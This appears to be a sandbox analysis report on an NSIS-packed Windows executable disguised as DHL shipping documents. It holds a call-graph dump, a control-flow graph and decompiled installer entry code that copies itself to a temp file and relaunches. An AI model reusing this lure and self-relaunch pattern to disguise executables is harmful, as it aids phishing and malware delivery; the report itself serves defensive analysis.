4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                        Executed Functions

                        Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                        C-Code - Quality: 78%
                        			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\hardz\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                        0x0040364e
                        0x0040364f
                        0x00403656
                        0x00403659
                        0x00403660
                        0x00403663
                        0x00403676
                        0x0040367c
                        0x0040367f
                        0x00403682
                        0x00403690
                        0x00403698
                        0x004036a3
                        0x004036bc
                        0x004036be
                        0x004036c6
                        0x004036c6
                        0x004036d1
                        0x004036d3
                        0x004036d3
                        0x004036e8
                        0x0040370d
                        0x0040371b
                        0x0040371e
                        0x00403725
                        0x0040372c
                        0x0040372c
                        0x00403725
                        0x0040372e
                        0x00403733
                        0x00403734
                        0x00403740
                        0x00403744
                        0x0040374b
                        0x00403759
                        0x0040375e
                        0x00403765
                        0x00403769
                        0x0040376d
                        0x0040376f
                        0x0040376f
                        0x0040376d
                        0x00403776
                        0x0040377d
                        0x00403783
                        0x0040379b
                        0x004037ab
                        0x004037b0
                        0x004037b6
                        0x004037bd
                        0x004037c4
                        0x004037c6
                        0x004037c7
                        0x004037d1
                        0x004037d8
                        0x004037da
                        0x004037dc
                        0x004037dc
                        0x004037ef
                        0x004037f1
                        0x004038eb
                        0x004038eb
                        0x004038ee
                        0x004038f1
                        0x00000000
                        0x00000000
                        0x004037fb
                        0x004037fc
                        0x004037ff
                        0x00403808
                        0x00403808
                        0x0040380b
                        0x0040380e
                        0x00403811
                        0x00403814
                        0x00403814
                        0x00403814
                        0x00403815
                        0x00403819
                        0x004038d9
                        0x004038e2
                        0x004038e4
                        0x004038e7
                        0x004038ea
                        0x004038ea
                        0x004038ea
                        0x00000000
                        0x0040381f
                        0x00403820
                        0x00403821
                        0x00403825
                        0x0040383f
                        0x00403846
                        0x00403859
                        0x0040385a
                        0x0040386f
                        0x00403874
                        0x00403876
                        0x00403878
                        0x00403894
                        0x0040389b
                        0x004038ae
                        0x004038af
                        0x004038c4
                        0x004038ca
                        0x004038cc
                        0x004038ce
                        0x004038d6
                        0x004038d8
                        0x00000000
                        0x004038d8
                        0x004038d2
                        0x004038d4
                        0x004038f9
                        0x004038fd
                        0x00403906
                        0x0040390b
                        0x00403911
                        0x0040391c
                        0x0040391e
                        0x00403923
                        0x00403925
                        0x0040397d
                        0x00403982
                        0x0040398b
                        0x00403992
                        0x00403995
                        0x00403b6c
                        0x00403b6c
                        0x00403b71
                        0x00403b7a
                        0x00403b97
                        0x00403c0f
                        0x00403c0f
                        0x00403c17
                        0x00403c19
                        0x00403c19
                        0x00403c1f
                        0x00403c1f
                        0x00403bae
                        0x00403bba
                        0x00403bcb
                        0x00403bd2
                        0x00403bd9
                        0x00403bd9
                        0x00403be1
                        0x00403bed
                        0x00403bfb
                        0x00403c06
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403bef
                        0x00403bef
                        0x00403bf0
                        0x00403bf2
                        0x00403bf3
                        0x00403bf4
                        0x00403bf9
                        0x00403c08
                        0x00403c0a
                        0x00000000
                        0x00403c0a
                        0x00000000
                        0x00403bf9
                        0x00403bed
                        0x00403b84
                        0x00403b8b
                        0x00403b8b
                        0x004039a1
                        0x00403a48
                        0x00403a48
                        0x00403a54
                        0x00000000
                        0x00403a54
                        0x004039b2
                        0x004039ba
                        0x00403a0c
                        0x00403a0c
                        0x00403a12
                        0x00403a19
                        0x00403a67
                        0x00403a69
                        0x00403a6e
                        0x00403a70
                        0x00403a78
                        0x00403a78
                        0x00403a83
                        0x00403a88
                        0x00403a8f
                        0x00403a95
                        0x00403a97
                        0x00403b6a
                        0x00403b6a
                        0x00403b6a
                        0x00000000
                        0x00403a9d
                        0x00403a9d
                        0x00403a9f
                        0x00403aa0
                        0x00403aa9
                        0x00403aa2
                        0x00403aa2
                        0x00403aa2
                        0x00403aaf
                        0x00403ab7
                        0x00403abe
                        0x00403ac6
                        0x00403ac6
                        0x00403ad3
                        0x00403adf
                        0x00403ae9
                        0x00403ae9
